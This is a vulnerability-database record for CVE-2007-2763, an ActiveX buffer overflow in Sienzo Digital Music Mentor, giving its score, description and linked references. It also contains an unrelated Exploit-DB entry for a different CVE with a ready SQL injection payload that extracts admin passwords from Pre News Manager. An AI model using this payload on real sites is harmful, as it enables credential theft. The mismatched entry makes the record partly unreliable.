CVE-2007-2763
Published 2007-05-18
Priority P345, critical, 10 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 7.76% (93.9th percentile)
Buffer overflow in the UnlockSupport function in the LockModules subsystem in a certain ActiveX control in ltmm15.dll in Sienzo Digital Music Mentor (DMM) 2.6.0.4 allows remote attackers to execute arbitrary code via a long string in the second argument, a different issue than CVE-2007-2564.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sienzo | digital_music_mentor | — | — |
No detection rules found.
Exploit-DB
LeadTools MultiMedia 15 - 'Ltmm15.dll' ActiveX Control Stack Buffer Overflow
exploitdb·2007-05-17
CVE-2007-2763 LeadTools MultiMedia 15 - 'Ltmm15.dll' ActiveX Control Stack Buffer Overflow
---
source: https://www.securityfocus.com/bid/24035/info
LEADTOOLS Multimedia is prone to a stack-based buffer-overflow vulnerability because the software fails to adequately check boundaries on data supplied to an ActiveX control method.
An attacker can exploit this issue to execute arbitrary code in the context of a user running the application. Failed attempts will likely result in denial-of-service conditions.
LEADTOOLS Multimedia 15 is vulnerable; other versions may also be affected.
NOTE: The 'Ltmm15.dll' ActiveX control is included in Digital Music Mentor 2.6.0.4. Other applications may also include the ActiveX control.
Sienzo Digital Music Mentor (DMM) 2.6.0.4 (ltmm15.dll) Buffer Overflow
Exploit
Exploit-DB
Pre News Manager 1.0 - SQL Injection
exploitdb·2007-05-03
CVE-2006-2763 Pre News Manager 1.0 - SQL Injection
---
Pre News Manager v1.0 Remote SQL Injection
Found: Cyber-Security.org
Script site: http://www.preproject.com/news.asp
Exploit:
news_detail.php?nid=-1/**/union/**/select/**/0,1,2,password,4,5,6/**/from/**/admin/*
Example: http://www.preproject.com/news%20manager/
# milw0rm.com [2007-05-03]
No writeups or analysis indexed.
http://moaxb.blogspot.com/2007/05/moaxb-17-sienzo-digital-music-mentor.html
http://osvdb.org/36025
http://shinnai.altervista.org/viewtopic.php?id=42&t_id=19
http://www.securityfocus.com/bid/24035
http://www.shinnai.altervista.org/moaxb/20070517/sienzo2txt.html
https://exchange.xforce.ibmcloud.com/vulnerabilities/34353